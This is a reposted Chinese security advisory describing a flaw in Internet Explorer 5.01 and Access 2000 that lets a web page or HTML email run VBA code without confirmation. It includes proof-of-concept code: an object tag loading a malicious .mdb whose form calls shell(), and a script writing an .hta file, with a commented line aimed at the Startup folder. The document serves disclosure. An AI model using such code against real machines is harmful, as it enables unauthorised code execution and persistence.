欢迎光临
我们一直在努力

微软 IE5.01 和 Access 2000 可使用户执行恶意 VBA 代码 (APP,缺陷) (转)

建站超值云服务器,限时71元/月

微软 ie5.01 和 access 2000 可使用户执行恶意 vba 代码 (app,缺陷)
  
涉及程序:
microsoft internet explorer 5.01、microsoft access 2000
  
描述:
微软 ie5.01 和 access 2000 可使用户执行恶意 vba 代码

  
详细:
受影响的系统:
   microsoft access 2000
     + microsoft office 2000
       – microsoft windows 98
       – microsoft windows 95
       – microsoft windows nt 4.0
       – microsoft windows nt 2000

   microsoft internet explorer 5.01
     + microsoft windows 98
     + microsoft windows 95
     + microsoft windows nt 4.0
     + microsoft windows nt 2000

如果用户使用 ie 5.01 和 access 2000,有可能被服务器远程执行 visual basic for applications (vba) 代码。通过 www 页面或使用了 iframe 的 html 格式的邮件,可以在远程浏览者的计算机上执行 vba 代码,而无需用户确认。创建包含vba代码的 *.mdb 文件,其中的 shell() 调用足以执行客户方任意已知的可执行文件。接下来,在 html 页面中通过 object tag 引用这些恶意的 *.mdb 文件,当浏览器加载这页面的时候,vba代码将被执行。

以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负

———–access.html—————————-
<object data="db3.mdb" id="d1"></object>
———–in form1 of db3.mdb———————
private sub form_load()
on error goto err_command0_click
   dim stappname as string
   stappname = "c:\program files\accessories\wordpad.exe"
   msgbox ("trying to start: " & stappname)
   call shell(stappname, 1)

exit_command0_click:
   exit sub

err_command0_click:
   msgbox err.description
   resume exit_command0_click
end sub
—————————————————

—————————————————
<object data="book1.xla" id="sh1" width=0 height=0>
</object>
<script>
function f()
{
fn="c:\\georgi-xla.hta";
sh1.object.saveas(fn,6);
//sh1.object.saveas("c:\\windows\\start
menu\\programs\\startup\\georgi-xla.hta",6);
alert(fn+" sucessfully written");
}
settimeout("f()",5000);
</script>
—————————————————

赞(0)
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com 特别注意:本站所有转载文章言论不代表本站观点! 本站所提供的图片等素材,版权归原作者所有,如需使用,请与原作者联系。未经允许不得转载:IDC资讯中心 » 微软 IE5.01 和 Access 2000 可使用户执行恶意 VBA 代码 (APP,缺陷) (转)
分享到: 更多 (0)